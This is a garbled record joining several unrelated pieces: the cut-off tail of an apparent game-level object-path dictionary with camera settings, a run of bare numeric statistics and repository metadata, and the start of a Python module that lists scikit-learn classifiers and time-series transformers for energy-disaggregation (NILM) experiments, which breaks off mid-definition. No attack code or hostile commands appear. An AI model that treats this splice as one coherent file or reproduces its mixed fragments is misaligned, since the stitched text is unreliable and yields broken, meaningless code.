'["Objects"]["1235605888.0akelts"]["Objects"]["1235611353.63akelts"]["Objects"]["1235611353.64akelts"]','1235611361.55akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1235611361.55akelts"]','1235611361.56akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1235611361.56akelts"]','1235611361.58akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1235611361.58akelts"]','1235611361.5akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]','1235611519.63akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611519.63akelts"]','1235611519.69akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611519.63akelts"]["Objects"]["1235611519.69akelts"]','1235611528.14akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611528.14akelts"]','1235611528.16akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611528.14akelts"]["Objects"]["1235611528.16akelts"]','1235611528.78akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611528.78akelts"]','1235611528.8akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611528.78akelts"]["Objects"]["1235611528.8akelts"]','1235611529.42akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611529.42akelts"]','1235611529.44akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611529.42akelts"]["Objects"]["1235611529.44akelts"]','1235611530.08akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.08akelts"]','1235611530.09akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.08akelts"]["Objects"]["1235611530.09akelts"]','1235611530.73akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.73akelts"]','1235611530.75akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.73akelts"]["Objects"]["1235611530.75akelts"]','1235611531.39akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611531.39akelts"]','1235611531.41akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611531.39akelts"]["Objects"]["1235611531.41akelts"]','1235611532.06akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611532.06akelts"]','1235611532.08akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611532.06akelts"]["Objects"]["1235611532.08akelts"]','1235611532.73akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611532.73akelts"]','1235611532.73akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611532.73akelts"]["Objects"]["1235611532.73akelts0"]','1235611533.41akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611533.41akelts"]','1235611533.42akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611533.41akelts"]["Objects"]["1235611533.42akelts"]','1235611534.09akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611534.09akelts"]','1235611534.11akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611534.09akelts"]["Objects"]["1235611534.11akelts"]','1235611549.09akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611519.63akelts"]["Objects"]["1235611549.09akelts"]','1235611556.56akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611534.09akelts"]["Objects"]["1235611556.56akelts"]','1235611602.09akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611528.14akelts"]["Objects"]["1235611602.09akelts"]','1235611616.73akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611528.78akelts"]["Objects"]["1235611616.73akelts"]','1235611626.7akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611529.42akelts"]["Objects"]["1235611626.7akelts"]','1235611650.22akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.08akelts"]["Objects"]["1235611650.22akelts"]','1235611680.64akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.73akelts"]["Objects"]["1235611680.64akelts"]','1235611692.63akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611531.39akelts"]["Objects"]["1235611692.63akelts"]','1235611704.75akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611532.06akelts"]["Objects"]["1235611704.75akelts"]','1235611704.77akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611532.06akelts"]["Objects"]["1235611704.77akelts"]','1235611724.3akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611533.41akelts"]["Objects"]["1235611724.3akelts"]','1235611746.08akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611746.08akelts"]','1235611746.09akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611746.08akelts"]["Objects"]["1235611746.09akelts"]','1235611746.11akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611746.08akelts"]["Objects"]["1235611746.11akelts"]','1235611775.94akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611775.94akelts"]','1235611775.95akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611775.94akelts"]["Objects"]["1235611775.95akelts"]','1235611777.48akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611777.48akelts"]','1235611777.5akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611777.48akelts"]["Objects"]["1235611777.5akelts"]','1235611781.22akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611781.22akelts"]','1235611781.23akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611781.22akelts"]["Objects"]["1235611781.23akelts"]','1235611782.08akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611782.08akelts"]','1235611782.09akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611782.08akelts"]["Objects"]["1235611782.09akelts"]','1235611783.02akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.0akelts"]["Objects"]["1235611783.02akelts"]','1235611783.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.0akelts"]','1235611783.89akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.89akelts"]','1235611783.91akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.89akelts"]["Objects"]["1235611783.91akelts"]','1235611784.77akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611784.77akelts"]','1235611784.78akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611784.77akelts"]["Objects"]["1235611784.78akelts"]','1235611785.67akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611785.67akelts"]','1235611785.69akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611785.67akelts"]["Objects"]["1235611785.69akelts"]','1235611786.56akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611786.56akelts"]','1235611786.58akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611786.56akelts"]["Objects"]["1235611786.58akelts"]','1235611787.47akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611787.47akelts"]','1235611787.48akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611787.47akelts"]["Objects"]["1235611787.48akelts"]','1235611788.39akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611788.39akelts"]','1235611788.41akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611788.39akelts"]["Objects"]["1235611788.41akelts"]','1235611789.31akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611789.31akelts"]','1235611789.33akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611789.31akelts"]["Objects"]["1235611789.33akelts"]','1235611790.25akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611790.25akelts"]','1235611790.27akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611790.25akelts"]["Objects"]["1235611790.27akelts"]','1235611791.19akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611791.19akelts"]','1235611791.2akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611791.19akelts"]["Objects"]["1235611791.2akelts"]','1235611792.13akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611792.13akelts"]','1235611792.14akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611792.13akelts"]["Objects"]["1235611792.14akelts"]','1235611793.08akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611793.08akelts"]','1235611793.09akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611793.08akelts"]["Objects"]["1235611793.09akelts"]','1235611794.03akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611794.03akelts"]','1235611794.05akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611794.03akelts"]["Objects"]["1235611794.05akelts"]','1235611795.02akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611795.0akelts"]["Objects"]["1235611795.02akelts"]','1235611795.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611795.0akelts"]','1235611795.97akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611795.97akelts"]','1235611795.98akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611795.97akelts"]["Objects"]["1235611795.98akelts"]','1235611804.13akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611795.97akelts"]["Objects"]["1235611804.13akelts"]','1235611815.78akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611775.94akelts"]["Objects"]["1235611815.78akelts"]','1235611825.73akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611787.47akelts"]["Objects"]["1235611825.73akelts"]','1235611825.75akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611787.47akelts"]["Objects"]["1235611825.75akelts"]','1235611842.06akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611777.48akelts"]["Objects"]["1235611842.06akelts"]','1235611842.09akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611777.48akelts"]["Objects"]["1235611842.09akelts"]','1235611856.48akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611784.77akelts"]["Objects"]["1235611856.48akelts"]','1235611872.81akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611782.08akelts"]["Objects"]["1235611872.81akelts"]','1235611883.44akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.0akelts"]["Objects"]["1235611883.44akelts"]','1235611883.47akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.0akelts"]["Objects"]["1235611883.47akelts"]','1235611892.27akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.89akelts"]["Objects"]["1235611892.27akelts"]','1235611907.05akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611786.56akelts"]["Objects"]["1235611907.05akelts"]','1235611917.53akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611788.39akelts"]["Objects"]["1235611917.53akelts"]','1235611917.55akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611788.39akelts"]["Objects"]["1235611917.55akelts"]','1235611926.59akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611789.31akelts"]["Objects"]["1235611926.59akelts"]','1235611941.53akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611790.25akelts"]["Objects"]["1235611941.53akelts"]','1235611955.27akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611791.19akelts"]["Objects"]["1235611955.27akelts"]','1235611967.94akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611792.13akelts"]["Objects"]["1235611967.94akelts"]','1235611988.31akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611793.08akelts"]["Objects"]["1235611988.31akelts"]','1235686400.0akelts1': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611353.63akelts"]["Objects"]["1235686400.0akelts1"]','1236212352.0akelts2': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611792.13akelts"]["Objects"]["1236212352.0akelts2"]','1236212352.0akelts3': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611792.13akelts"]["Objects"]["1236212352.0akelts3"]','1236212352.0akelts4': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611791.19akelts"]["Objects"]["1236212352.0akelts4"]','1236212480.0akelts1': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611793.08akelts"]["Objects"]["1236212480.0akelts1"]','1236292864.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1236292864.0akelts"]','1236293632.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1236293632.0akelts"]','1236293632.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1236293632.0akelts"]["Objects"]["1236293632.0akelts0"]','1236293632.0akelts1': '["Objects"]["1235605888.0akelts"]["Objects"]["1236293632.0akelts"]["Objects"]["1236293632.0akelts1"]','1236293632.0akelts2': '["Objects"]["1235605888.0akelts"]["Objects"]["1236293632.0akelts2"]','1236293632.0akelts3': '["Objects"]["1235605888.0akelts"]["Objects"]["1236293632.0akelts2"]["Objects"]["1236293632.0akelts3"]','1236294016.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1236293632.0akelts"]["Objects"]["1236294016.0akelts"]','1237573872.64akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611116.59akelts"]["Objects"]["1237573872.64akelts"]','1237573913.83akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611116.59akelts"]["Objects"]["1237573872.64akelts"]["Objects"]["1237573913.83akelts"]','1237573940.19akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1236293632.0akelts2"]["Objects"]["1237573940.19akelts"]','1237573962.13akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1236293632.0akelts2"]["Objects"]["1237573940.19akelts"]["Objects"]["1237573962.13akelts"]','1237574022.48akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611035.98akelts"]["Objects"]["1237574022.48akelts"]','1237574300.08akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611035.98akelts"]["Objects"]["1237574300.08akelts"]','1237582208.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.02akelts"]["Objects"]["1237582208.0akelts"]','1237582592.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611792.13akelts"]["Objects"]["1237582592.0akelts"]','1237582592.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611792.13akelts"]["Objects"]["1237582592.0akelts0"]','1237583616.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611791.19akelts"]["Objects"]["1237583616.0akelts"]','1237583616.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611791.19akelts"]["Objects"]["1237583616.0akelts0"]','1237583744.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611793.08akelts"]["Objects"]["1237583744.0akelts"]','1237583872.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.0akelts"]["Objects"]["1237583872.0akelts"]','1237583872.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.89akelts"]["Objects"]["1237583872.0akelts0"]','1237584000.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.0akelts"]["Objects"]["1237584000.0akelts"]','1237584000.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611795.97akelts"]["Objects"]["1237584000.0akelts0"]','1237584256.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.73akelts"]["Objects"]["1237584256.0akelts"]','1237584256.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1237584256.0akelts0"]','1237584256.0akelts1': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.73akelts"]["Objects"]["1237584256.0akelts1"]','1237584384.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611529.42akelts"]["Objects"]["1237584384.0akelts"]','1237584384.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611528.78akelts"]["Objects"]["1237584384.0akelts0"]','1237584512.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.91akelts"]["Objects"]["1237584512.0akelts"]','1237587968.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.73akelts"]["Objects"]["1237587968.0akelts"]','1237588608.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611121.0akelts"]["Objects"]["1237588608.0akelts"]','1237588864.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.91akelts"]["Objects"]["1237588864.0akelts"]','1237588864.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.91akelts"]["Objects"]["1237588864.0akelts0"]','1237590784.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611035.98akelts"]["Objects"]["1237590784.0akelts"]','1237590912.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.33akelts"]["Objects"]["1237590912.0akelts"]','1237591040.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611519.63akelts"]["Objects"]["1237591040.0akelts"]','1237593600.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611788.39akelts"]["Objects"]["1237593600.0akelts"]','1237593728.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611786.56akelts"]["Objects"]["1237593728.0akelts"]','1237593856.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.0akelts"]["Objects"]["1237593856.0akelts0"]','1237593984.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611787.47akelts"]["Objects"]["1237593984.0akelts"]','1237593984.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611787.47akelts"]["Objects"]["1237593984.0akelts0"]','1237593984.0akelts1': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611787.47akelts"]["Objects"]["1237593984.0akelts1"]','1237594112.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611777.48akelts"]["Objects"]["1237594112.0akelts"]','1237594112.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611775.94akelts"]["Objects"]["1237594112.0akelts0"]','1237594240.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611795.97akelts"]["Objects"]["1237594240.0akelts0"]','1237594240.0akelts1': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611795.97akelts"]["Objects"]["1237594240.0akelts1"]','1237594240.0akelts2': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611795.97akelts"]["Objects"]["1237594240.0akelts2"]','1237594368.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611117.31akelts"]["Objects"]["1237594368.0akelts"]','1237595008.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611528.78akelts"]["Objects"]["1237595008.0akelts"]','1237595136.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611528.78akelts"]["Objects"]["1237595136.0akelts"]','1237827026.68akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1237827026.68akelts"]','1237827053.79akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611352.94akelts"]["Objects"]["1237827053.79akelts"]','1237827104.49akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611534.09akelts"]["Objects"]["1237827104.49akelts"]','1237827147.39akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611120.45akelts"]["Objects"]["1237827147.39akelts"]','1237827221.59akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611352.94akelts"]["Objects"]["1237827221.59akelts"]','1237827472.21akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611352.94akelts"]["Objects"]["1237827472.21akelts"]','1237827511.65akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611353.63akelts"]["Objects"]["1237827511.65akelts"]','1237827546.46akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611353.63akelts"]["Objects"]["1237827546.46akelts"]','1237827576.62akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1237827576.62akelts"]','1237828348.45akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611532.06akelts"]["Objects"]["1237828348.45akelts"]','1237828366.56akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611532.06akelts"]["Objects"]["1237828366.56akelts"]','1237828412.73akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611746.08akelts"]["Objects"]["1237828412.73akelts"]','1238121988.24kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.08akelts"]["Objects"]["1238121988.24kmuller"]','1238122156.47kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1238122156.47kmuller"]','1238122175.84kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611519.63akelts"]["Objects"]["1238122175.84kmuller"]','1238122450.62kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.73akelts"]["Objects"]["1238122450.62kmuller"]','1238122549.4kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.73akelts"]["Objects"]["1238122549.4kmuller"]','1238122886.85kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1238122886.85kmuller"]','1238123063.16kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.08akelts"]["Objects"]["1238123063.16kmuller"]','1238123123.41kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611519.63akelts"]["Objects"]["1238123123.41kmuller"]','1238123165.21kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1238123165.21kmuller"]','1238123189.34kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.33akelts"]["Objects"]["1238123189.34kmuller"]','1238123307.1kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1238123307.1kmuller"]','1238123315.1kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1238123315.1kmuller"]','1238123329.65kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.91akelts"]["Objects"]["1238123329.65kmuller"]','1238123885.11kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611120.45akelts"]["Objects"]["1238123885.11kmuller"]','1238124363.02kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1238124363.02kmuller"]','1238124386.78kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1238124386.78kmuller"]','1238124424.97kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1238124424.97kmuller"]','1238124454.94kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1238124454.94kmuller"]','1238124512.89kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1238124512.89kmuller"]','1238124542.84kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1238124542.84kmuller"]','1238124581.13kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1238124581.13kmuller"]','1238124674.48kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1238124674.48kmuller"]','1238125045.1kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.73akelts"]["Objects"]["1238125045.1kmuller"]','1238125152.02kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.73akelts"]["Objects"]["1238125152.02kmuller"]','1238128143.19kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.33akelts"]["Objects"]["1238128143.19kmuller"]'}}
extraInfo = {'camPos': Point3(-161.645, 61.3813, 241.156),'camHpr': VBase3(-78.9347, -5.84403, 0),'focalLength': 1.39999997616,'skyState': 16,'fog': 1}
| 45,375
| 135,920
| 0.699196
| 17,042
| 136,125
| 5.517193
| 0.052165
| 0.028099
| 0.03012
| 0.025908
| 0.681954
| 0.638167
| 0.523739
| 0.430167
| 0.342455
| 0.302444
| 0
| 0.352443
| 0.045987
| 136,125
| 3
| 135,921
| 45,375
| 0.37157
| 0
| 0
| 0
| 0
| 0.666667
| 0.677174
| 0.23537
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
bf7d9ff7ac1cfd9f8b3164f0e775194718b6b15c
| 46,320
|
py
|
Python
|
nilmlab/exp_model_list.py
|
ChristoferNal/multi-nilm
|
0ec1d1a834b04da121963bf82eb0f540d76a8409
|
[
"MIT"
] | 32
|
2020-04-29T07:03:08.000Z
|
2021-12-21T02:24:43.000Z
|
nilmlab/exp_model_list.py
|
qiu-2020/multi-nilm
|
0ec1d1a834b04da121963bf82eb0f540d76a8409
|
[
"MIT"
] | 3
|
2020-10-23T07:26:42.000Z
|
2021-09-30T11:07:10.000Z
|
nilmlab/exp_model_list.py
|
qiu-2020/multi-nilm
|
0ec1d1a834b04da121963bf82eb0f540d76a8409
|
[
"MIT"
] | 10
|
2020-05-31T02:02:32.000Z
|
2022-02-10T01:42:37.000Z
|
from sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.neural_network import MLPClassifier
from sklearn.tree import ExtraTreeClassifier
from skmultilearn.adapt import MLkNN
from skmultilearn.ensemble import RakelD
from datasources.paths_manager import SAVED_MODEL, PATH_SIGNAL2VEC
from nilmlab.factories import TransformerFactory
from nilmlab.lab import TransformerType
SAX = 'SAX'
SAX1D = 'SAX1D'
SFA = 'SFA'
DFT = 'DFT'
PAA = 'PAA'
WEASEL = 'WEASEL'
SIGNAL2VEC = 'SIGNAL2VEC'
TRANSFORMER_MODELS = 'TRANSFORMER_MODELS'
CLF_MODELS = 'CLF_MODELS'
BOSS = 'BOSS'
TIME_DELAY_EMBEDDING = 'TIME_DELAY_EMBEDDING'
WAVELETS = 'WAVELETS'
selected_models_10mins = {
BOSS : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_boss(word_size=4, n_bins=20, window_size=10, norm_mean=False,
norm_std=False)
]
},
SIGNAL2VEC: {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=1)
]
},
PAA : {
CLF_MODELS : [
ExtraTreesClassifier(n_jobs=-1, n_estimators=500)
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True)
]
},
DFT : {
CLF_MODELS : [
ExtraTreesClassifier(n_jobs=-1, n_estimators=500)
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True)
]
},
SFA : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False)
]
},
SAX1D : {
CLF_MODELS : [
RandomForestClassifier(n_jobs=-1, n_estimators=100)
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10)
]
},
SAX : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=50, supports_approximation=True)
]
}
}
selected_models_4h = {
BOSS : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(100, 100), learning_rate='adaptive', solver='adam',
activation='logistic')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_boss(word_size=2, n_bins=26, window_size=10, norm_mean=False,
norm_std=False),
TransformerFactory.build_pyts_boss(word_size=2, n_bins=25, window_size=10, norm_mean=False,
norm_std=False),
TransformerFactory.build_pyts_boss(word_size=2, n_bins=26, window_size=10, norm_mean=False,
norm_std=False),
TransformerFactory.build_pyts_boss(word_size=2, n_bins=26, window_size=10, norm_mean=False,
norm_std=False)
]
},
SIGNAL2VEC: {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam'),
],
TRANSFORMER_MODELS: [
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=5),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=10),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=10),
